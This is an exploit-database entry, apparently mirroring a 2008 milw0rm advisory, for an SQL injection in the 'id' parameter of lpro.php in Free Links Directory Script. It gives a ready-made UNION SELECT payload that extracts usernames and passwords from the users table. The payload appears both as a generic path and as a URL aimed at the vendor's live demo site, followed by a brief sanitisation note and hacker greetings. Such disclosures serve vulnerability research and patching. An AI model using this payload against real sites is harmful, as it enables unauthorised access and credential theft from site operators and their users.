header-logo
Suggest Exploit
vendor:
Free Links Directory Script
by:
nuclear
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Free Links Directory Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Free Links Directory Script (id) SQL Injection Vulnerability

The vulnerability exists in the lpro.php file, which is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable file with the parameter ‘id’ set to ‘-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users’. This will allow the attacker to view the usernames and passwords of all users in the database.

Mitigation:

The vendor should ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

#Free Links Directory Script (id) SQL Injection Vulnerability


#Author: nuclear


#site:
http://flds-script.com


#vuln:
http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users


#demo:
http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users

#notes:
Script is full of bugs like this, too bored to catch em all !


#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar

# milw0rm.com [2008-12-15]

Navigation

Suggest Exploit

Services By CQR